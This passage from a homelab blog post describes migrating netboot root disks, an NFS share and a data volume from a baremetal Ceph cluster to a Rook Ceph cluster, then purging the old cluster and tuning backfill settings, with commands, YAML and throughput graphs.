<li>The root disks of all of my netbooting nodes, in the form of 50 GB RBDs</li>
</ol>
<p>In the rest of this post, I will go over how I migrated all three of those, shut
down the old baremetal cluster and migrated its two physical nodes into the
Rook Ceph cluster.</p>
<h2 id="root-disk-migration">Root disk migration</h2>
<p>The first step was migrating the root disks of my netbooting hosts. Those hosts
are eight Raspberry Pi CM4 and an x86 SBC, all without any local storage.
Those hosts use a 50 GB RBD each as their root disk. Those needed to be migrated
over to the new Rook Ceph cluster and their configuration changed to contact the
Rook MON daemons.
If you&rsquo;re interested in the details of my netboot setup, have a look at <a href="https://blog.mei-home.net/tags/netboot/">this series of posts</a>.</p>
<p>As these RBDs were block devices, I was initially at a bit of a loss when
thinking about migrating them over. Sure, those nine netbooters were as cattle-ish
as it got, so I could just completely recreate them - but the setup of fresh hosts
is the weakest part of my Homelab setup. It would have taken me a couple of evenings.</p>
<p>Luckily, <a href="https://www.reddit.com/r/ceph/comments/gi7jlz/ceph_snapshot_transfer/">Reddit to the rescue</a>.
It turns out that the <a href="https://docs.ceph.com/en/reef/man/8/rbd/">rbd tool</a> can
both import and export RBD images, including via stdin/stdout.</p>
<p>I did the migration node by node, and because at this point all of the nodes
were in the k8s cluster, I had to start with draining them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain --delete-emptydir-data<span style="color:#f92672">=</span>true --force<span style="color:#f92672">=</span>true --ignore-daemonsets<span style="color:#f92672">=</span>true examplehost
</span></span></code></pre></div><p>Then the node also needs to be shut down, because migrating the disk from one
Ceph cluster to another really isn&rsquo;t going to work online.
Once the host was safely shut down, I could do the actual copy operation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rbd --id admin export --no-progress hostdisks/examplehost - | rbd -c ceph-rook.conf -k client.admin.key --id admin import - hostdisks/examplehost
</span></span></code></pre></div><p>The first <code>rbd</code> invocation does not receive an explicit Ceph config file, so it
uses the default <code>/etc/ceph/ceph.conf</code> file, which at this point was still the
config for the baremetal cluster. The <code>hostdisks</code> pool was the destination pool
for the copy operation.
One issue worth noting here is that the <code>rbd</code> tool as provided by the <a href="https://github.com/rook/kubectl-rook-ceph">Rook kubectl plugin</a>
did not work as the receiving command. I was immediately getting broken
pipe errors. Probably something to do with how it is implemented as a kubectl plugin.</p>
<p>With the copy done, which took about ten minutes per disk, I then had to adapt
the configuration of the MON IPs in the host&rsquo;s kernel command line. For one of
my Pis, it looks something like this:</p>
<pre tabindex="0"><code>console=serial0,115200 dwc_otg.lpm_enable=0 console=tty1 root=LABEL=writable rootfstype=ext4 rootwait fixrtc  boot=rbd rbdroot=300.300.300.310,300.300.300.311,300.300.300.312:cephuser:pw:hostdisks:examplehost::_netdev,noatime hllogserver=logs.internal:12345
</code></pre><p>The list of three IPs after <code>rbdroot=</code> contains the MONs used. Then I also had
to change the Ceph key in the <code>pw</code> field.</p>
<p>And then I could reboot the host. And what should I say, all nine hosts went
through without a single issue. I had expected at least some sort of problem,
but I was seemingly pretty well prepared.</p>
<p>Before going to the next migration, let&rsquo;s have a look at some Ceph metrics for
this copy operation. First the throughput:</p>
<p><figure>
    <img loading="lazy" src="disks-throughput.png"
         alt="A screenshot of a Grafana time series plot. It shows roughly three hours worth of data, time on the X axis and throughput in MB on the Y axis. For the quiet periods, the throughput is around 1-2 MB/s. But there are eight &#39;hills&#39; in the plot, each about ten minutes long, which show a throughput between 30 and 50 MB/s."/> <figcaption>
            <p>Throughput graph for the receiving Ceph cluster for eight of the disk migrations.</p>
        </figcaption>
</figure>

Interesting things here are the approximately ten minutes of duration for each
of the disk migrations and the fact that the maximum throughput reached is around
50 MB/s. It&rsquo;s worth noting that, in contrast to a <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">previous copy operation</a>,
the target disks were SSDs this time around. So 50 MB/s sounds a bit too little,
doesn&rsquo;t it? Well, yes and no. &#x1f642;
This time I made another little mistake I had discussed previously, namely I
ran the copy operation on my C&amp;C host. And that means that the data needs to
go through my router, because the Ceph cluster and the C&amp;C host live on different
VLANs and subnets.</p>
<p>This might already somewhat be the explanation, when looking at the throughput
on my router next:
<figure>
    <img loading="lazy" src="network-router.png"
         alt="A screenshot of a Grafana time series plot. It shows the network utilization Mb/s for the network interface both the Ceph hosts and the C&amp;C host hang off of. Like the previous throughput plot, it shows 8 load phases. In each of them, about 700 - 800 Mb/s come in and go out again."/> <figcaption>
            <p>Network graphs for the NIC both the Ceph hosts and the C&amp;C host hang off of.</p>
        </figcaption>
</figure>

While yes, this doesn&rsquo;t look like the 1 GbE interface is saturated, there might
be some other kind of issue? Meaning this might actually be the max it can do
for this particular routing scenario? Then again, the CPU really should be capable
of routing 1 Gbps.</p>
<p>Next, let&rsquo;s have a quick look at the IO utilization on the two receiving hosts:
<figure>
    <img loading="lazy" src="io-hostdisks.png"
         alt="A screenshot of a Grafana time series plot. It shows the IO utilization in percent of two hosts, each represented by its own plot. Again, the eight copy operations are clearly visible as hills in the plots. One host goes up to 20%, while the other goes up to almost 60%. Neither of them come close to 100% IO utilization."/> <figcaption>
            <p>IO utilization of the two receiving hosts.</p>
        </figcaption>
</figure>
</p>
<p>So clearly, this time around the IO utilization is not the problem. Neither is
the CPU:
<figure>
    <img loading="lazy" src="hostdisks-cpu.png"
         alt="A screenshot of a Grafana time series plot. The two hosts shown have an idle CPU percentage of 95% and 90% respectively. The eight copy operations are again clearly visible as hills in the plots. For one of the hosts, the idle percentage doesn&#39;t move much, only from 95% to 90%. For the other host the impact is more visible, moving the idle percentage down to 65% to 70%. "/> <figcaption>
            <p>CPU idle percentage of the two receiving hosts.</p>
        </figcaption>
</figure>

Both hosts still have a lot of headroom here. But I did find this as well:
<figure>
    <img loading="lazy" src="candc-cpu.png"
         alt="A screenshot of a Grafana time series plot. This time only one host&#39;s CPU idle percentage is shown. It is 97% idle at rest, but deep troughs down to around 55% idle are visible for the eight copy operations. "/> <figcaption>
            <p>CPU idle percentage the C&amp;C host doing the rbd import/export.</p>
        </figcaption>
</figure>
</p>
<p>This <em>might</em> be the explanation for why I&rsquo;m reaching no more than 50 MB/s throughput
even though this is a copy from SSD to SSD. The C&amp;C host is a pretty weak one,
it has an AMD Embedded G-Series GX-412TC CPU - very low powered. But normally
that&rsquo;s more than enough, as it doesn&rsquo;t need to do compute heavy stuff. But this
might be too much for it? I&rsquo;m not familiar with the <code>rbd</code> import/export implementation,
but looking at the plot, I could theorize: This looks like two of the four cores
being fully pegged. Possibly one by the <code>rbd export</code> and one by the <code>rbd import</code>?
And the roughly 50 MB/s is simply all it can really do?</p>
<p>I think I need to dig deeper into this at some point, running some proper testing
of what I can really do when it comes to reads and writes in Ceph.</p>
<p>That&rsquo;s it for the disk copying. Let&rsquo;s move onto the second element of my netboot
setup, the boot partitions sitting on NFS.</p>
<h2 id="nfs-setup">NFS setup</h2>
<p>For the boot partitions, I needed to come up with something special, because those
need to be &ldquo;shared&rdquo; between the host they belong to and my cluster master, which
runs a TFTP server. That&rsquo;s because to mount the RBD root disks, I need a kernel
running, and that kernel needs to come from somewhere. Plus, the hosts should
all be able to independently run updates, or even different operating systems.
So I couldn&rsquo;t just share one boot partition between all of them.</p>
<p>For this, again, I&rsquo;m using my Ceph cluster and the integrated support for
<a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a>.</p>
<p>I configured the cluster with the <a href="https://rook.io/docs/rook/latest-release/CRDs/ceph-nfs-crd/">Rook NFS CRD</a>,
looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephNFS</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-nfs</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Settings for the NFS server</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">active</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-cluster-critical&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">NIV_INFO</span>
</span></span></code></pre></div><p>This creates a single NFS pod in the cluster. If I read the docs right,
NFS doesn&rsquo;t do HA very well, so there&rsquo;s not much use to have more than one.
One of the things Ceph does when an NFS cluster is set up is to create the
<code>.nfs</code> pool, as location for some metadata. This in turn leads to the Ceph
PG autoscaler to stop working with this warning:</p>
<pre tabindex="0"><code>debug 2025-03-10T13:54:45.313+0000 7fa1ad391640  0 [pg_autoscaler WARNING root] pool 6 contains an overlapping root -3... skipping scaling
</code></pre><p>I&rsquo;ve written about the last time I encountered this issue <a href="https://blog.mei-home.net/posts/ceph-rook-crush-rules/">here</a>,
so suffice to say that the root cause is that the new pool is created with a
generic CRUSH rule that contains several other CRUSH rules. It&rsquo;s fixed by
applying a more specific rule to the pool.</p>
<p>Because I wanted to use the NFS cluster outside k8s, I also introduced this
Service:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-rook-external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">nfs.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;300.300.300.102&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-nfs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ceph_nfs</span>: <span style="color:#ae81ff">hl-nfs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>: <span style="color:#ae81ff">a</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2049</span>
</span></span></code></pre></div><p>This allowed me not to have a fixed host I could enter into the <code>/etc/fstab</code> of
my hosts, and NFS is perfectly happy with having to use DNS to get the IP of
the NFS server.</p>
<p>Next is the NFS share itself. These shares can be backed by either a CephFS
subvolume or an S3 bucket. But the S3 bucket backend has severe restrictions.
I tried it once, and found that e.g. Git repos on such an NFS share don&rsquo;t work,
with Git commands returning <code>Not Implemented</code> errors. So I created a CephFS
subvolume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume create my-cephfs my-share
</span></span></code></pre></div><p>Then comes the creation of the NFS share:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs export create cephfs --cluster-id hl-nfs --pseudo-path /my-share-path --fsname my-cephfs --path /volumes/_nogroup/my-share/UUID-HERE --client_addr 300.300.300.0/24 --client_addr 300.300.315.0/24
</span></span></code></pre></div><p>The <code>--path</code> parameter can be fetched via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath my-cephfs my-share
</span></span></code></pre></div><p>One thing I&rsquo;m a bit sad about is that I had to use the command line to create
those two objects, the subvolume and the NFS share, instead of being able to use
CRDs in the k8s cluster.</p>
<p>The resulting NFS share definition, as fetched with <code>ceph nfs export ls hl-nfs --detailed</code>,
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>[
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;access_type&#34;</span>: <span style="color:#e6db74">&#34;none&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clients&#34;</span>: [
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;access_type&#34;</span>: <span style="color:#e6db74">&#34;rw&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addresses&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;300.300.300.0/24&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;300.300.315.0/24&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;squash&#34;</span>: <span style="color:#e6db74">&#34;None&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;cluster_id&#34;</span>: <span style="color:#e6db74">&#34;hl-nfs&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;export_id&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;fsal&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;fs_name&#34;</span>: <span style="color:#e6db74">&#34;my-cephfs&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;CEPH&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;user_id&#34;</span>: <span style="color:#e6db74">&#34;nfs.hl-nfs.1&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/volumes/_nogroup/my-share/UUID-HERE&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;protocols&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;pseudo&#34;</span>: <span style="color:#e6db74">&#34;/my-share-path&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;security_label&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;squash&#34;</span>: <span style="color:#e6db74">&#34;None&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;transports&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;TCP&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>The end effect of all of this is an NFS share which can be mounted like this:</p>
<pre tabindex="0"><code>nfs.example.com:/my-share-path /mnt/example nfs defaults,timeo=900,_netdev 0 0
</code></pre><p>One small note on the migration: Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/posix/mount_module.html">mount module</a>
does not seem to automatically remount when a mount is changed. Which is likely
a good idea, but it meant that I had to execute these commands on all of my
netbooters:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;host1:host2:host3&#34;</span> -a <span style="color:#e6db74">&#34;umount /boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;host1:host2:host3&#34;</span> -a <span style="color:#e6db74">&#34;mount /boot/firmware&#34;</span>
</span></span></code></pre></div><p>After that, they all had the right NFS share mounted and I was one step closer
to shutting down the baremetal cluster.</p>
<h2 id="copying-my-warehouse-volume-over">Copying my warehouse volume over</h2>
<p>As I&rsquo;ve mentioned above, I&rsquo;ve got a &ldquo;random bunch of stuff&rdquo; CephFS subvolume
that is mounted on my desktop. It really contains exactly that: A random
assortment of data. Copies of old University slides and projects, backups for
my OpenWRT WiFi router&rsquo;s config and some old database dumps from services I&rsquo;m
no longer running. Overall, it&rsquo;s about 129 GB, so not too much data, in contrast
to my Linux ISO collection for example.</p>
<p>Here&rsquo;s the rsync command and its output:</p>
<pre tabindex="0"><code>rsync -av --info=progress2 --info=name0 /mnt/tempt1/* /mnt/temp2/
sending incremental file list
129,648,120,620  99%   41.86MB/s    0:49:14 (xfr#1415, to-chk=0/1537)

sent 129,679,927,316 bytes  received 27,564 bytes  43,892,352.30 bytes/sec
total size is 129,654,775,448  speedup is 1.00
</code></pre><p>Absolutely nothing interesting happened here, it took only about 49 minutes.
If you&rsquo;re interested in some metrics about a 1.7 TB copy operation from one
CephFS subvolume on one cluster to another subvolume on another cluster, have
a look at <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">this recent post</a>.</p>
<h2 id="final-takedown-of-the-baremetal-cluster">Final takedown of the baremetal cluster</h2>
<p>So that&rsquo;s it. With the warehouse volume transferred, there was, supposedly, nothing
important on that cluster anymore.</p>
<p>But I wasn&rsquo;t about to trust that. Instead, I ran <code>ceph df</code> to confirm, and found
that there was exactly 348 MB of data left. Deciding that that can&rsquo;t be anything
important, I ran the cluster purge by executing this command on all the remaining
cluster hosts, meaning the two OSD nodes and the three cluster controllers hosting
the MONs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cephadm rm-cluster --force --zap-osds --fsid a84c7196-7ebf-11eb-b290-18c04d00217f
</span></span></code></pre></div><p>And just like that, the baremetal Ceph cluster was gone. It lived for almost
exactly four years, having been created on 2021-03-06, at 21:05.</p>
<h2 id="adding-the-two-baremetal-hosts-to-the-rook-cluster">Adding the two baremetal hosts to the Rook cluster</h2>
<p>After the old cluster had been removed, I needed to add the two OSD hosts to
the Rook cluster. I did so by first adding them to the k8s cluster and then
updating the Rook cluster&rsquo;s Helm values:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;host1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5002538e90b5e22f&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee2ba48465d&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;host2&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5002538e90b68866&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee20f9d1545&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>Both hosts have one 1 TB SATA SSD and one 4 TB HDD. To be absolutely save, I&rsquo;m
using the disk&rsquo;s <a href="https://en.wikipedia.org/wiki/World_Wide_Name">WWN</a> to identify
them.</p>
<p>After that, the rebalancing started:</p>
<p><figure>
    <img loading="lazy" src="pgs-host-addition.png"
         alt="A screenshot of a Grafana time series plot. It shows the state of the 265 Placement Groups in the cluster. At approximately 23:18, they go 130 PGs being remapped. Initially, the count of remapped PGs goes down relatively quickly, reaching only 67 remapped PGs around 01:02. But after that, the number of remapped PGs goes down only slowly, reaching zero around 19:44."/> <figcaption>
            <p>PG state during the rebalancing after adding the two additional hosts with four additional OSDs.</p>
        </figcaption>
</figure>

The initial relatively rapid reduction in remapped PGs was probably the SSD PGs,
and the rest were the HDD OSDs.</p>
<p>I would love to show you the overall throughput of the backfill operations, but
it looks like there are no metrics for those. The <code>ceph_osd_op_r_out_bytes</code> and
<code>ceph_osd_op_w_in_bytes</code> metrics I&rsquo;m using for the general cluster throughput
seem to only be actual client operations. That throughput definitely did not show
the backfill load on the OSDs.</p>
<p>So let&rsquo;s instead have a look at the throughput of the six disks in the cluster:
<figure>
    <img loading="lazy" src="host-additions-writes.png"
         alt="A screenshot of a Grafana time series plot. At the beginning, it hovers somewhere around 10 MB/s, until it goes up to 30 MB/s around 23:19. The next jump comes at 23:49, to 70 MB/s. It goes down a bit again at 01:00, to around 40 MB/s. After that, the plot hovers anywhere between 30 MB/s and 50 MB/s until about 09:20, where it goes up to 70 MB/s for another 45 minutes or so, before coming down to 30 - 40 MB/s at 10 and stays there until 12:00. Then it goes up yet again to 50 MB/s. After 14:00, the plot slowly goes down towards the initial 10 MB/s range, which it reaches around 19:40."/> <figcaption>
            <p>Accumulated bytes written per second on all disks, HDD and SSD, in the Rook cluster during the rebalancing.</p>
        </figcaption>
</figure>

I just created that graph by adding up the written bytes per second from the
node exporter data I&rsquo;m gathering, specifically for the eight disks which are
part of the Rook cluster at this point.</p>
<p>The graph has a couple of points worth discussing. The first one to note is that
there was not much load on the cluster overall from clients, it hovered around
1 - 2 MB/s, typical for my Homelab. And still, during the rebalancing only used,
at maximum, 70 MB/s worth of writes. And remember, these are not just HDDs, but
also SSDs. And I&rsquo;m pretty sure that this is entirely due to Ceph itself.
At the beginning of the plot, around 23:49, you can see a jump from around
30 MB/s to 70 MB/s. That happened after I entered the following two commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_override_recovery_settings true
</span></span><span style="display:flex;"><span>ceph config set osd osd_max_backfills <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>These instruct Ceph to use more than one backfill per OSD. Then you can also see
another jump at 09:20 the next morning, where the throughput suddenly goes from
around 40 MB/s to 70 MB/s again, at least for a short while. That was after
I entered this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_profile high_recovery_ops
</span></span></code></pre></div><p>I will refrain from any expletives at this point, because I don&rsquo;t understand this
well enough to judge whether I&rsquo;m the problem here, or whether Ceph really works
this way.</p>
<p>So, a little while ago, Ceph introduced a new IO scheduler, <a href="https://docs.ceph.com/en/reef/rados/configuration/mclock-config-ref/">mclock</a>.
The config settings I showed above impact how that scheduler works.</p>
<p>Why do I have to make these settings? Why, with barely 1 MB/s throughput, do I
actually have to tell Ceph to run more than one backfill per OSD? And why doesn&rsquo;t
Ceph actually use the OSDs full throughput for even that one default backfill?
Because that graph above, that&rsquo;s not a single disk. That&rsquo;s the sum of the throughput
on all of them. This kind of write throughput would be pathetic for a single HDD.
I really don&rsquo;t understand why my mixed HDD/SSD cluster shows it.
What does the scheduler actually do here? I mean, don&rsquo;t get me wrong - there is
likely a good reason, but I don&rsquo;t understand it. Why not use an OSD&rsquo;s full write
capacity for backfills <em>when there is nearly no other traffic happening</em>?</p>
<p>I was really stumped when I saw these numbers. And also, why even have a scheduler
when I still need to manually set the maximum number of backfills allowed?</p>
<p>Anyway, there&rsquo;s now a &ldquo;Learn Ceph&rdquo; task in my backlog. When the migration is done,
I will not put my old home server back into storage. Instead, I will buy a couple
more disks and use it as a Ceph playground. And if I have to read the entire
Ceph source code from <code>int main()</code> to the end, I will. Because I&rsquo;m now intensely
curious at why the backfill was so darned slow.</p>
<p>And now, let&rsquo;s come to the &ldquo;Michael utterly embarrasses himself&rdquo; part of this post.</p>
<h2 id="arrogance">Arrogance</h2>
<p>After the addition of the new hosts was done, I could shut down the Ceph VM running
on my extension host, as it was no longer required.</p>
<p>And I learned that I have an unhealthy amount of arrogance. I went into this
thinking &ldquo;Well, I sure know how to remove a host from a Ceph cluster, I don&rsquo;t
need any docs!&rdquo;.</p>
<p><em>Narrator:</em> He did need docs.</p>
<p>So let&rsquo;s start with what I should have done. I should have followed
<a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Advanced/ceph-osd-mgmt/#host-based-cluster">these Rook docs</a>.
They describe, in very nice detail, what to do to remove OSDs from a Rook Ceph
cluster.</p>
<p>But no. That was of course not what I did. What I did was just winging it.
So I started by removing the host from the <code>values.yaml</code> file. That had only one
effect, namely showing messages like this in the logs of the Rook operator:</p>
